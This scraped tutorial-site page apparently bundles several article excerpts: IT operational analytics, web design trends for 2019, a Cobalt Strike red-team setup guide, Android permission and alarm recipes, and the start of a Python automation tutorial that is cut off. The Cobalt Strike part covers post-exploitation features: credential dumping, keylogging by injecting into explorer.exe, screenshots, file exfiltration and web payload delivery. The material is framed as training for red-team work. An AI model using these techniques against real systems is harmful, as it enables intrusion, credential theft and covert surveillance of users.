assistance of this AI-centric log analytics platform . IT operational analytics Operational analytics helps with the following: Extricating operational insights Reducing IT costs and complexity Improving employee productivity Identifying and fixing service problems for an enhanced user experience Gaining end-to-end insights critical to the business operations, offerings, and outputs To facilitate operational analytics, there are integrated platforms, and their contributions are given as follows: Troubleshoot applications, investigate security incidents, and facilitate compliance requirements in minutes instead of hours or days Analyze various performance indicators to enhance system performance Use report-generation capabilities to indicate the various trends in preferred formats (maps, charts, and graphs) and much more! Thus, the operational analytics capability comes handy in capturing operational data (real-time and batch) and crunching them to produce actionable insights to enable autonomic systems. Also, the operational team members, IT experts, and business decision-makers can get useful information on working out correct countermeasures if necessary. The operational insights gained also convey what needs to be done to empower the systems under investigation to attain their optimal performance. IT performance and scalability analytics There are typically big gaps between the theoretical and practical performance limits. The challenge is how to enable systems to attain their theoretical performance level under any circumstance. The performance level required can suffer due to various reasons like poor system design, bugs in software, network bandwidth, third-party dependencies, and I/O access. Middleware solutions can also contribute to the unexpected performance degradation of the system. The system's performance has to be maintained under any loads (user, message, and data). Performance testing is one way of recognizing the performance bottlenecks and adequately addressing them. The testing is performed in the pre-production phase. Besides the system performance, application scalability and infrastructure elasticity are other prominent requirements. There are two scalability options, indicated as follows: Scale up for fully utilizing SMP hardware Scale-out for fully utilizing distributed processors It is also possible to have both at the same time. That is, to scale up and out is to combine the two scalability choices. IT security analytics IT infrastructure security, application security, and data (at rest, transit, and usage) security are the top three security challenges, and there are security solutions approaching the issues at different levels and layers. Access-control mechanisms, cryptography, hashing, digest, digital signature, watermarking, and steganography are the well-known and widely used aspects of ensuing impenetrable and unbreakable security. There's also security testing, and ethical hacking for identifying any security risk factors and eliminating them at the budding stage itself. All kinds of security holes, vulnerabilities, and threats are meticulously unearthed in to deploy defect-free, safety-critical, and secure software applications. During the post-production phase, the security-related data is being extracted out of both software and hardware products, to precisely and painstakingly spit out security insights that in turn goes a long way in empowering security experts and architects to bring forth viable solutions to ensure the utmost security and safety for IT infrastructures and software applications. The importance of root-cause analysis The cost of service downtime is growing up. There are reliable reports stating that the cost of downtime ranges from $100,000-$72,000 per minute. Identifying the root-cause (mean-time-to-identification (MTTI) generally takes hours. For a complex situation, the process may run into days. OverOps analyzes code in staging and production to automatically detect and deliver the root-causes for all errors with no dependency on logging. OverOps shows you a stack trace for every error and exception. However, it also shows you the complete source code, objects, variables, and values that caused that error or exception to be thrown. This assists in identifying the root-cause of when your code breaks. OverOps injects a hyperlink into the exception's link, and you'll be able to jump directly into the source code and actual variable state that cause it. OverOps can co-exist in production alongside all the major APM agents and profilers. Using OverOps with your APM allows monitoring server slowdowns and errors, along with the ability to drill down into the real root-cause of each issue. Summary There are several activities being strategically planned and executed to enhance the resiliency, robustness, and versatility of enterprise, edge, and embedded IT. This tutorial described the various post-production data analytics to allow you to gain a deeper understanding of applications, middleware solutions, databases, and IT infrastructures to manage them effectively and efficiently. In order to gain experience on working with SRE concepts and be able to deliver highly reliable apps and services, check out this book Practical Site Reliability Engineering. Site reliability engineering: Nat Welch on what it is and why we need it [Interview] Key trends in software infrastructure in 2019: observability, chaos, and cloud complexity 5 ways artificial intelligence is upgrading software engineering
Read more
  • 0
  • 0
  • 49572

article-image-7-web-design-trends-and-predictions-for-2019
Guest Contributor
12 Jan 2019
6 min read
Save for later

7 Web design trends and predictions for 2019

Guest Contributor
12 Jan 2019
6 min read
Staying updated about web design trends is very crucial. The latest norm today may change tomorrow with shifting algorithms, captivating visuals and introduction of best practices. Remaining on top by frequently reforming your website is thus quintessential to avoid looking like a reminiscent of an outdated website. 2019 will be all about engaging website designs focusing on flat designs, captivating structures & layouts, speed, mobile performance and so on. Here are 7 web design predictions which we think will be trending in 2019 #1 Website speed You would have come across this pivotal aspect of web design. It is strongly recommended for the loading time of websites to be necessarily less than three seconds to have a lasting impact on visitors. Having your visitors waiting for more than this duration would result in a high bounce rate. Based on a survey by Aberdeen Group, 5% of organizations found that website visitors abandoned their website in a second of delay. Enthralling website design with overloaded data slowing your page speed could eat up on your revenue in a huge way. Google Speed updates which came into effect from July 2018 emphasize the need to focus on the page loading time. Moreover, Google prioritizes and ranks faster loading websites. Though the need for videos and images still exists in web design, the need in 2019 will be to reduce the page loading time without compromising on the look of the website. #2 Mobile first phenomenon With user preferences inclined greatly towards mobile devices, the need for the “mobile first” web design has become the need of the hour. This is not only to rank higher on SERP but also to boost the quality of customer experiences on the device. Websites need to be exclusively designed for mobile devices in the first place. The mobile first web design is a completely focused conceptualization of the website on mobile taking into consideration parameters like a responsive and user-friendly design. Again, 2019 will need more of optimization inclined towards voice search. Users are impatient to get hold of information in the fastest way possible. Voice search on mobile will include: Focusing on long tail keywords, conversational and natural spoken language. Appropriate usage of schema metadata Emphasize on semantics Optimization based on local listing This is yet another unmissable trend of 2019. #3 Flat designs Clutter-free, focused websites have always been in demand. Flat design is all about minimalism and improved usability. This kind of design helps to focus on the important parts of the website using bright colors, clean-edged designs and a lot of free space. There are two reasons for website owners to opt for flat designs in 2019. They contain lesser components which are data-light, and are fast- loading, improving the website speed and optimization quotient. Also, it enhances customer experience with a quick loading website on both the mobile and desktop versions. So by adapting to flat designs, websites can stay back longer on user favorite lists, in turn, churning out elevated conversion rates. #4 Micro-animations Micro animations may seem like minute features on a webpage but they do add great value. A color change when you click the submit button conveys that the action has been performed. An enlarged list when you point the mouse on a particular product makes your presence felt. Such animations communicate to the user about actions accomplished. Again, visuals are always captivating, be it a background video or a micro animation. Such micro animations do impact by creating a visual hierarchy and compelling users towards conversion points. So micro animations are definitely here to stay back in 2019. #5 Chatbots Chatbots have become much more common as they help bridge communication gaps. This is because these chatbots have emerged smarter with improved Artificial Intelligence and machine learning techniques. They can improve response time, personalize communication and automate repetitive tasks. Chatbots understand our data based on previous chat history, predict what we might be looking for and give us auto recommendations about products. Chatbots can sense our interest and provide us with personalized ad content thereby enhancing customer satisfaction. Chatbots serve as crucial touch points. They can intelligently handle customer service while collecting sensitive customer data for the sales team. This way you can analyze your customer base even before initiating a first cut discussion with them. 2019 will be a year which will see many more such interactions being incorporated in websites. #6 Single page designs Simple, clutter-free and single page design is going to be a buzzword of 2019. When we say single page design it literally means a single page without extra links leading to blogs or detailed services. The next question would be about SEO optimization based on keywords and content. To begin with, a single page designed websites have a neatly siloed hierarchy. As they do not have aspects that slow down your website, they are easily compatible across devices. The page-less design has minimal HTML and JavaScript which improves customer experience, in turn, helping to earn a higher keyword ranking on SEO. Also, with way lesser elements on the page, they can be managed easily. Frequent updates and changes based on customer expectations and trends can be done at regular intervals adding greater value to the website. This is yet another aspect to watch in 2019. #7 Shapes incorporated Incorporating simple geometric shapes on your website could do wonders with its appearance. They are easily loadable and are also engaging. Shapes are similar to colors which throw an impact on the mood of the visitors. Rectangles showcase stability, circles represent unity and triangles are supposed to reflect dynamism. Using shapes based on your aesthetic sense either sparingly or liberally can definitely catch the attention of your visitors. You could place them in areas you want to seek attention and create a visual hierarchy. Implementing geometric shapes on your website will drive traffic and affect your potential sales in a huge way. Staying on top of the competition is all about presenting fresh ideas without compromising on the quality of services and user experience. Emerge as a pacesetter on par with upcoming trends and differentiate your services in the current milieu to reap maximum benefits. Author Bio Swetha S. is adept at creating customer-centered marketing strategies focused on augmenting brand presence. She is currently the Digital Marketing Manager for eGrove Systems and Elite Site optimizer, contributing towards the success of the organization.
Read more
  • 0
  • 0
  • 23094
article-image-red-team-tactics-getting-started-with-cobalt-strike-tutorial
Savia Lobo
12 Jan 2019
15 min read
Save for later

Red Team Tactics: Getting started with Cobalt Strike [Tutorial]

Savia Lobo
12 Jan 2019
15 min read
According to cobaltstrike.com: "Cobalt Strike is a software for Adversary Simulations and Red Team Operations. Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations, these assessments benefit security operations and incident response." This tutorial is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book demonstrates advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of what Cobalt Strike is, how to set it up, and also about its interface. Before installing Cobalt Strike, please make sure that you have Oracle Java installed with version 1.7 or above. You can check whether or not you have Java installed by executing the following command: java -version If you receive the java command not found error or another related error, then you need to install Java on your system. You can download this here: https://www.java.com/en/. Cobalt Strike comes in a package that consists of a client and server files. To start with the setup, we need to run the team server. The following are the files that you'll get once you download the package: The first thing we need to do is run the team server script located in the same directory. What is a team server? This is the main controller for the payloads that are used in Cobalt Strike. It logs all of the events that occur in Cobalt Strike. It collects all the credentials that are discovered in the post-exploitation phase or used by the attacker on the target systems to log in. It is a simple bash script that calls for the Metasploit RPC service (msfrpcd) and starts the server with cobaltstrike.jar. This script can be customized according to the needs. Cobalt Strike works on a client-server model in which the red-teamer connects to the team server via the Cobalt Strike client. All the connections (bind/reverse) to/from the victims are managed by the team server. The system requirements for running the team server are as follows: System requirements: 2 GHz+ processor 2 GB RAM 500MB+ available disk space Amazon EC2: At least a high-CPU medium (c1.medium, 1.7 GB) instance Supported operating systems: Kali Linux 1.0, 2.0 – i386 and AMD64 Ubuntu Linux 12.04, 14.04 – x86, and x86_64 The Cobalt Strike client supports: Windows 7 and above macOS X 10.10 and above Kali Linux 1.0, 2.0 – i386 and AMD64 Ubuntu Linux 12.04, 14.04 – x86, and x86_64 As shown in the following screenshot, the team server needs at least two mandatory arguments in order to run. This includes host, which is an IP address that is reachable from the internet. If behind a home router, you can port forward the listener's port on the router. The second mandatory argument is password, which will be used by the team server for authentication: The third and fourth arguments specify a Malleable C2 communication profile and a kill date for the payloads (both optional). A Malleable C2 profile is a straightforward program that determines how to change information and store it in an exchange. It's a really cool feature in Cobalt Strike. The team server must run with the root privileges so that it can start the listener on system ports (port numbers: 0-1023); otherwise, you will receive a Permission denied error when attempting to start a listener: The Permission denied error can be seen on the team server console window, as shown in the following screenshot: Now that the concept of the team server has been explained, we can move on to the next topic. You'll learn how to set up a team server for accessing it through Cobalt Strike. Cobalt Strike setup The team server can be run using the following command: sudo ./teamserver 192.168.10.122 harry@123 Here, I am using the IP 192.168.10.122 as my team server and harry@123 as my password for the team server: If you receive the same output as we can see in the preceding screenshot, then this means that your team server is running successfully. Of course, the SHA256 hash for the SSL certificate used by the team server will be different each time it runs on your system, so don't worry if the hash changes each time you start the server. Upon successfully starting the server, we can now get on with the client. To run the client, use the following command: java -jar cobaltstrike.jar This command will open up the connect dialog, which is used to connect to the Cobalt Strike team server. At this point, you need to provide the team server IP, the Port number (which is 50050, by default), the User (which can be any random user of your choice), and the Password for the team server. The client will connect with the team server when you press the Connect button. Upon successful authorization, you will see a team server fingerprint verification window. This window will ask you to show the exact same SHA256 hash for the SSL certificate that was generated by the team server at runtime. This verification only happens once during the initial stages of connection. If you see this window again, your team server is either restarted or you are connected to a new device. This is a precautionary measure for preventing Man-in-the-Middle (MITM) attacks: Once the connection is established with the team server, the Cobalt Strike client will open: Let's look further to understand the Cobalt Strike interface so that you can use it to its full potential in a red-team engagement. Cobalt Strike interface The user interface for Cobalt Strike is divided into two horizontal sections, as demonstrated in the preceding screenshot. These sections are the visualization tab and the display tab. The top of the interface shows the visualization tab, which visually displays all the sessions and targets in order to make it possible to better understand the network of the compromised host. The bottom of the interface shows the display tab, which is used to display the Cobalt Strike features and sessions for interaction. Toolbar Common features used in Cobalt Strike can be readily accessible at the click of a button. The toolbar offers you all the common functions to speed up your Cobalt Strike usage: Each feature in the toolbar is as follows: Connecting to another team server In order to connect to another team server, you can click on the + sign, which will open up the connect window: All of the previous connections will be stored as a profile and can be called for connection again in the connect window: Disconnecting from the team server By clicking on the minus (–) sign, you will be disconnected from the current instance of the team server: You will also see a box just above the server switchbar that says Disconnected from team server. Once you disconnect from the instance, you can close it and continue the operations on the other instance. However, be sure to bear in mind that once you close the tab after disconnection, you will lose all display tabs that were open on that particular instance. What's wrong with that? This may cause some issues. This is because in a red-team operation you do not always have the specific script that will execute certain commands and save the information in the database. In this case, it would be better to execute the command on a shell and then save the output on Notepad or Sublime. However, not many people follow this practice, and hence they lose a lot of valuable information. You can now imagine how heart-breaking it can be to close the instance in case of disconnection and find that all of your shell output (which was not even copied to Notepad) is gone! Configure listeners For a team server to function properly, you need to configure a listener. But before we can do this, we need to know what a listener actually is. Just like the handler used in Metasploit (that is, exploit/multi/handler), the Cobalt Strike team server also needs a handler for handling the bind/reverse connections to and from the target/victim's system/server. You can configure a listener by clicking on the headphones-like icon: After clicking the headphones icon, you'll open the Listeners tab in the bottom section. Click on the Add button to add a new listener: You can choose the type of payload you want to listen for with the Host IP address and the port to listen on for the team server or the redirector: In this case, we have used a beacon payload, which will be communicating over SSL. Beacon payloads are a special kind of payload in Cobalt Strike that may look like a generic meterpreter but actually have much more functionality than that. Beacons will be discussed in more detail in further chapters. As a beacon uses HTTP/S as the communication channel to check for the tasking allotted to it, you'll be asked to give the IP address for the team server and domain name in case any redirector is configured (Redirectors will be discussed in more details in further chapters): Once you're done with the previous step, you have now successfully configured your listener. Your listener is now ready for the incoming connection: Session graphs To see the sessions in a graph view, you can click the button shown in the following screenshot: Session graphs will show a graphical representation of the systems that have been compromised and injected with the payloads. In the following screenshot, the system displayed on the screen has been compromised. PT is the user, PT-PC is the computer name (hostname), and the numbers just after the @ are the PIDs of the processes that have the payload injected into them: When you escalate the privileges from a normal user to NT AUTHORITY\SYSTEM (vertical privilege escalation), the session graph will show the system in red and surrounded by lightning bolts. There is also another thing to notice here: the * (asterisk) just after the username. This means that the system with PID 1784 is escalated to NT AUTHORITY\SYSTEM: Session table To see the open sessions in a tabular view, click on the button shown in the following screenshot: All the sessions that are opened in Cobalt Strike will be shown along with the sessions' details. For example, this may include external IP, internal IP, user, computer name, PID into which the session is injected, or last. Last is an element of Cobalt Strike that is similar to WhatsApp's Last Seen feature, showing the last time that the compromised system contacted the team server (in seconds). This is generally used to check when the session was last active: Right-clicking on one of the sessions gives the user multiple options to interact with, as demonstrated in the following screenshot: These options will be discussed later in the book. Targets list To view the targets, click on the button shown in the following screenshot: Targets will only show the IP address and the computer name, as follows: For further options, you can right-click on the target: From here, you can interact with the sessions opened on the target system. As you can see in the preceding screenshot, PT@2908 is the session opened on the given IP and the beacon payload resides in the PID 2908. Consequently, we can interact with this session directly from here: Credentials Credentials such as web login passwords, password hashes extracted from the SAM file, plain-text passwords extracted using mimikatz, etc. are retrieved from the compromised system and are saved in the database. They can be displayed by clicking on the icon shown in the following screenshot: When you perform a hashdump in Metasploit (a post-exploitation module that dumps all NTLM password hashes from the SAM database), the credentials are saved in the database. With this, when you dump hashes in Cobalt Strike or when you use valid credentials to log in, the credentials are saved and can be viewed from here: Downloaded files To view all the exfiltrated data from the target system, you can click on the button shown in the following screenshot: This will show the files (exfiltration) that were downloaded from the target system: Keystrokes This option is generally used when you have enabled a keylogger in the beacon. The keylogger will then log the keystrokes and send it to the beacon. To use this option, click the button shown in the following screenshot: When a user logs into the system, the keylogger will log all the keystrokes of that user (explorer.exe is a good candidate for keylogging). So, before you enable the keylogger from the beacon, migrate or inject a new beacon into the explorer.exe process and then start the keylogger. Once you do this, you can see that there's a new entry in the Keystrokes tab: The left side of the tab will show the information related to the beacon. This may include the user, the computer name, the PID in which the keylogger is injected, and the timestamp when the keylogger sends the saved keystrokes to the beacon. In contrast, the right side of the tab will show you the keystrokes that were logged. Screenshots To view the screenshots from the target system, click on the button shown in the following screenshot: This will open up the tab for screenshots. Here, you will get to know what's happening on the system's screen at that moment itself. This is quite helpful when a server administrator is logged in to the system and works on Active Directory (AD) and Domain Controller (DC) settings. When monitoring the screen, we can find crucial information that can lead to DC compromise: To know about Payload generation in stageless Windows executable, Java signed applet, and MS Office macros, head over to the book for a complete overview. Scripted web delivery This technique is used to deliver the payload via the web. To continue, click on the button shown in the following screenshot: A scripted web delivery will deliver the payload to the target system when the generated command/script is executed on the system. A new window will open where you can select the type of script/command that will be used for payload delivery. Here, you also have the option to add the listener accordingly: File hosting Files that you want to host on a web server can also be hosted through the Cobalt Strike team server. To host a file through the team server, click on the button shown in the following screenshot: This will bring up the window where you can set the URI, the file you want to host, the web server's IP address and port, and the MIME type. Once done, you can download the same file from the Cobalt Strike team server's web server. You can also provide the IP and port information of your favorite web redirector. This method is generally used for payload delivery: Managing the web server The web server running on the team server, which is generally used for file hosting and beacons, can be managed as well. To manage the web server, click on the button shown in the following screenshot: This will open the Sites tab where you can find all web services, the beacons, and the jobs assigned to those running beacons. You can manage the jobs here: Server switchbar The Cobalt Strike client can connect to multiple team servers at the same time and you can manage all the existing connections through the server switchbar. The switchbar allows you to switch between the server instances: You can also rename the instances according to the role of the server. To do this, simply right-click on the Instance tab and you'll get two options: Rename and Disconnect: You need to click on the Rename button to rename the instance of your choice. Once you click this button, you'll be prompted for the new name that you want to give to your instance: For now, we have changed this to EspionageServer: Renaming the switchbar helps a lot when it comes to managing multiple sessions from multiple team servers at the same time. To know more about how to customize a team server head over to the book. To summarize, we got to know what a team server is, how to setup Cobalt Strike and about the Cobalt Strike Interface. If you've enjoyed reading this, head over to the book, Hands-On Red Team Tactics to know about advanced penetration testing tools, techniques to get reverse shells over encrypted channels, and processes for post-exploitation. “All of my engineering teams have a machine learning feature on their roadmap” – Will Ballard talks artificial intelligence in 2019 [Interview] IEEE Computer Society predicts top ten tech trends for 2019: assisted transportation, chatbots, and deep learning accelerators among others Facebook releases DeepFocus, an AI-powered rendering system to make virtual reality more real
Read more
  • 0
  • 0
  • 35987

article-image-getting-your-android-app-ready-for-the-play-storetutorial
Natasha Mathur
11 Jan 2019
11 min read
Save for later

Getting your Android app ready for the Play Store[Tutorial]

Natasha Mathur
11 Jan 2019
11 min read
In this tutorial, we will discuss adding finishing touches to your Android app before you release it to the play store such as using the Android 6.0 Runtime permission model, scheduling an alarm,  receiving notification of a device boot, Using AsyncTask for background work recipe, adding speech recognition to your app,  and adding Google sign-in to your app. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores more than 100 proven industry standard recipes and strategies to help you build feature-rich and reliable Android Pie apps. The Android 6.0 Runtime Permission Model The old security model was a sore point for many in Android. It's common to see reviews commenting on the permissions an app requires. Sometimes, permissions were unrealistic (such as a Flashlight app requiring internet permission), but other times, the developer had good reasons to request certain permissions. The main problem was that it was an all-or-nothing prospect. This finally changed with the Android 6 Marshmallow (API 23) release. The new permission model still declares permissions in the manifest as before, but users have the option of selectively accepting or denying each permission. Users can even revoke a previously granted permission. Although this is a welcome change for many, for a developer, it has the potential to break the code that was working before. Google now requires apps to target Android 6.0 (API 23) and above to be included on the Play Store. If you haven't already updated your app, apps not updated will be removed by the end of the year (2018). Getting ready Create a new project in Android Studio and call it RuntimePermission. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. The sample source code sets the minimum API to 23, but this is not required. If your compileSdkVersion is API 23 or above, the compiler will flag your code for the new security model. How to do it... We need to start by adding our required permission to the manifest, then we'll add a button to call our check permission code. Open the Android Manifest and follow these steps: Add the following permission: Open activity_main.xml and replace the existing TextView with this button: Open MainActivity.java and add the following constant to the class: private final int REQUEST_PERMISSION_SEND_SMS=1; Add this method for a permission check: private boolean checkPermission(String permission) { int permissionCheck = ContextCompat.checkSelfPermission( this, permission); return (permissionCheck == PackageManager.PERMISSION_GRANTED); } Add this method to request permission: private void requestPermission(String permissionName, int permissionRequestCode) { ActivityCompat.requestPermissions(this, new String[]{permissionName}, permissionRequestCode); } Add this method to show the explanation dialog: private void showExplanation(String title, String message, final String permission, final int permissionRequestCode) { AlertDialog.Builder builder = new AlertDialog.Builder(this); builder.setTitle(title) .setMessage(message) .setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog,int id) { requestPermission(permission, permissionRequestCode); } }); builder.create().show(); } Add this method to handle the button click: public void doSomething(View view) { if (!checkPermission(Manifest.permission.SEND_SMS)) { if (ActivityCompat.shouldShowRequestPermissionRationale(this, Manifest.permission.SEND_SMS)) { showExplanation("Permission Needed", "Rationale", Manifest.permission.SEND_SMS, REQUEST_PERMISSION_SEND_SMS); } else { requestPermission(Manifest.permission.SEND_SMS, REQUEST_PERMISSION_SEND_SMS); } } else { Toast.makeText(MainActivity.this, "Permission (already) Granted!", Toast.LENGTH_SHORT) .show(); } } Override onRequestPermissionsResult() as follows: @Override public void onRequestPermissionsResult(int requestCode, String permissions[], int[] grantResults) { switch (requestCode) { case REQUEST_PERMISSION_SEND_SMS: { if (grantResults.length > 0 && grantResults[0] == PackageManager.PERMISSION_GRANTED) { Toast.makeText(MainActivity.this, "Granted!", Toast.LENGTH_SHORT) .show(); } else { Toast.makeText(MainActivity.this, "Denied!", Toast.LENGTH_SHORT) .show(); } return; } } } Now, you're ready to run the application on a device or emulator. How it works... Using the new Runtime Permission model involves the following: Check to see whether you have the desired permissions If not, check whether we should display the rationale (meaning that the request was previously denied) Request the permission; only the OS can display the permission request Handle the request response Here are the corresponding methods: ContextCompat.checkSelfPermission ActivityCompat.requestPermissions ActivityCompat.shouldShowRequestPermissionRationale onRequestPermissionsResult Even though you are requesting permissions at runtime, the desired permission must be listed in the Android Manifest. If the permission is not specified, the OS will automatically deny the request. How to schedule an alarm Android provides AlarmManager to create and schedule alarms. Alarms offer the following features: Schedule alarms for a set time or interval Maintained by the OS, not your application, so alarms are triggered even if your application is not running or the device is asleep Can be used to trigger periodic tasks (such as an hourly news update), even if your application is not running Your app does not use resources (such as timers or background services), since the OS manages the scheduling Alarms are not the best solution if you need a simple delay while your application is running (such as a short delay for a UI event.) For short delays, it's easier and more efficient to use a Handler, as we've done in several previous recipes. When using alarms, keep these best practices in mind: Use as infrequent an alarm timing as possible Avoid waking up the device Use as imprecise timing as possible; the more precise the timing, the more resources required Avoid setting alarm times based on clock time (such as 12:00); add random adjustments if possible to avoid congestion on servers (especially important when checking for new content, such as weather or news) Alarms have three properties, as follows: Alarm type (see in the following list) Trigger time (if the time has already passed, the alarm is triggered immediately) Pending Intent A repeating alarm has the same three properties, plus an Interval: Alarm type (see the following list) Trigger time (if the time has already passed, it triggers immediately) Interval Pending Intent There are four alarm types: RTC (Real Time Clock): This is based on the wall clock time. This does not wake the device. RTC_WAKEUP: This is based on the wall clock time. This wakes the device if it is sleeping. ELAPSED_REALTIME: This is based on the time elapsed since the device boot. This does not wake the device. ELAPSED_REALTIME_WAKEUP: This is based on the time elapsed since the device boot. This wakes the device if it is sleeping. Elapsed Real Time is better for time interval alarms, such as every 30 minutes. Alarms do not persist after device reboots. All alarms are canceled when a device shuts down, so it is your app's responsibility to reset the alarms on device boot. The following recipe will demonstrate how to create alarms with AlarmManager. Getting ready Create a new project in Android Studio and call it Alarms. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. How to do it... Setting an alarm requires a Pending Intent, which Android sends when the alarm is triggered. Therefore, we need to set up a Broadcast Receiving to capture the alarm intent. Our UI will consist of just a simple button to set the alarm. To start, open the Android Manifest and follow these steps: Add the following <receiver> to the <application> element at the same level as the existing <activity> element: Open activity_main.xml and replace the existing TextView with the following button: Create a new Java class called AlarmBroadcastReceiver using the following code: public class AlarmBroadcastReceiver extends BroadcastReceiver { public static final String ACTION_ALARM= "com.packtpub.alarms.ACTION_ALARM"; @Override public void onReceive(Context context, Intent intent) { if (ACTION_ALARM.equals(intent.getAction())) { Toast.makeText(context, ACTION_ALARM, Toast.LENGTH_SHORT).show(); } } } Open ActivityMain.java and add the method for the button click: public void setAlarm(View view) { Intent intentToFire = new Intent(getApplicationContext(), AlarmBroadcastReceiver.class); intentToFire.setAction(AlarmBroadcastReceiver.ACTION_ALARM); PendingIntent alarmIntent = PendingIntent.getBroadcast(getApplicationContext(), 0, intentToFire, 0); AlarmManager alarmManager = (AlarmManager)getSystemService(Context.ALARM_SERVICE); long thirtyMinutes=SystemClock.elapsedRealtime() + 30 * 1000; alarmManager.set(AlarmManager.ELAPSED_REALTIME, thirtyMinutes, alarmIntent); } You're ready to run the application on a device or emulator. How it works... Creating the alarm is done with this line of code: alarmManager.set(AlarmManager.ELAPSED_REALTIME, thirtyMinutes, alarmIntent); Here's the method signature: set(AlarmType, Time, PendingIntent); Prior to Android 4.4 KitKat (API 19), this was the method to request an exact time. Android 4.4 and later will consider this as an inexact time for efficiency, but will not deliver the intent prior to the requested time. (See setExact() as follows if you need an exact time.) To set the alarm, we create a Pending Intent with our previously defined alarm action: public static final String ACTION_ALARM= "com.packtpub.alarms.ACTION_ALARM"; This is an arbitrary string and could be anything we want, but it needs to be unique, so we prepend our package name. We check for this action in the Broadcast Receiver's onReceive() callback. There's more... If you click the Set Alarm button and wait for thirty minutes, you will see the Toast when the alarm triggers. If you are too impatient to wait and click the Set Alarm button again before the first alarm is triggered, you won't get two alarms. Instead, the OS will replace the first alarm with the new alarm, since they both use the same Pending Intent. (If you need multiple alarms, you need to create different Pending Intents, such as using different Actions.) Cancel the alarm If you want to cancel the alarm, call the cancel() method by passing the same Pending Intent you have used to create the alarm. If we continue with our recipe, this is how it would look: alarmManager.cancel(alarmIntent); Repeating alarm If you want to create a repeating alarm, use the setRepeating() method. The Signature is similar to the set() method, but with an interval. This is shown as follows: setRepeating(AlarmType, Time (in milliseconds), Interval, PendingIntent); For the Interval, you can specify the interval time in milliseconds or use one of the predefined AlarmManager constants: INTERVAL_DAY INTERVAL_FIFTEEN_MINUTES INTERVAL_HALF_DAY INTERVAL_HALF_HOUR INTERVAL_HOUR Receiving notification of device boot Android sends out many intents during its lifetime. One of the first intents sent is ACTION_BOOT_COMPLETED. If your application needs to know when the device boots, you need to capture this intent. This recipe will walk you through the steps required to be notified when the device boots. Getting ready Create a new project in Android Studio and call it DeviceBoot. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. How to do it... To start, open the Android Manifest and follow these steps: Add the following permission: Add the following <receiver> to the <application> element, at the same level as the existing <activity> element: Create a new Java class called BootBroadcastReceiver using the following code: public class BootBroadcastReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { if (intent.getAction().equals( "android.intent.action.BOOT_COMPLETED")) { Toast.makeText(context, "BOOT_COMPLETED", Toast.LENGTH_SHORT).show(); } } } Reboot the device to see the Toast. How it works... When the device boots, Android will send the BOOT_COMPLETED intent. As long as our application has the permission to receive the intent, we will receive notifications in our Broadcast Receiver. There are three aspects to make this work: Permission for RECEIVE_BOOT_COMPLETED Adding both BOOT_COMPLETED and DEFAULT to the receiver intent filter Checking for the BOOT_COMPLETED action in the Broadcast Receiver Obviously, you'll want to replace the Toast message with your own code, such as for recreating any alarms you might need. Thus, in this article, we looked at different factors that need to be checked off before your app gets ready for the play store.  We discussed three topics: Android 6.0 Runtime permission model, scheduling an alarm and detecting a device reboot.  If you found this post useful, be sure to check out the book 'Android 9 Development Cookbook - Third Edition', to learn about using AsyncTask for background work recipe, adding speech recognition to your app,  and adding Google sign-in to your app. Building an Android App using the Google Faces API [ Tutorial] How Android app developers can convert iPhone apps 6 common challenges faced by Android App developers
Read more
  • 0
  • 0
  • 12372

article-image-preparing-and-automating-a-task-in-python-tutorial
Bhagyashree R
10 Jan 2019
15 min read
Save for later

Preparing and automating a task in Python [Tutorial]

Bhagyashree R
10 Jan 2019
15 min read
To properly automate tasks, we need a platform so that they run automatically at the proper times. A task that needs to be run manually is not really fully automated. But, in order to be able to leave them running in the background while worrying about more pressing issues, the task will need to be adequate to run in fire-and-forget mode. We should be able to monitor that it runs correctly, be sure that we are capturing future actions (such as receiving notifications if something interesting arises), and know whether there have been any errors while running it. Ensuring that a piece of software runs consistently with high reliability is actually a very big deal and is one area that, to be done properly, requires specialized knowledge and staff, which typically go by the names of sysadmin, operations, or SRE (Site Reliability Engineering). In this article, we will learn how to prepare and automatically run tasks. It covers how to program tasks to be executed when they should, instead of running them manually, and how to be notified if there has been an error in an automated process. This article is an excerpt from a book written by Jaime Buelta titled Python Automation Cookbook.  The Python Automation Cookbook helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. To follow along with the examples implemented in the article, you can find the code on the book's GitHub repository. Preparing a task It all starts with defining exactly what task needs to be run and designing it in a way that doesn't require human intervention to run. Some ideal characteristic points are as follows: Single, clear entry point: No confusion on what the task to run is. Clear parameters: If there are any parameters, they should be very explicit. No interactivity: Stopping the execution to request information from the user is not possible. The result should be stored: To be able to be checked at a different time than when it runs. Clear result: If we are working interactively in a result, we accept more verbose results or progress reports. But, for an automated task, the final result should be as concise and to the point as possible. Errors should be logged: To analyze what went wrong. A command-line program has a lot of those characteristics already. It has a clear way of running, with defined parameters, and the result can be stored, even if just in text format. But, it can be improved with a config file to clarify the parameters and an output file. Getting ready We'll start by following a structure in which the main function will serve as the entry point, and all parameters are supplied to it. The definition of the main function with all the explicit arguments covers points 1 and 2. Point 3 is not difficult to achieve. To improve point 2 and 5, we'll look at retrieving the configuration from a file and storing the result in another. How to do it... Prepare the following task and save it as prepare_task_step1.py: import argparse def main(number, other_number): result = number * other_number print(f'The result is {result}') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) args = parser.parse_args() main(args.n1, args.n2) Update the file to define a config file that contains both arguments, and save it as prepare_task_step2.py: import argparse import configparser def main(number, other_number): result = number * other_number print(f'The result is {result}') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file') args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = 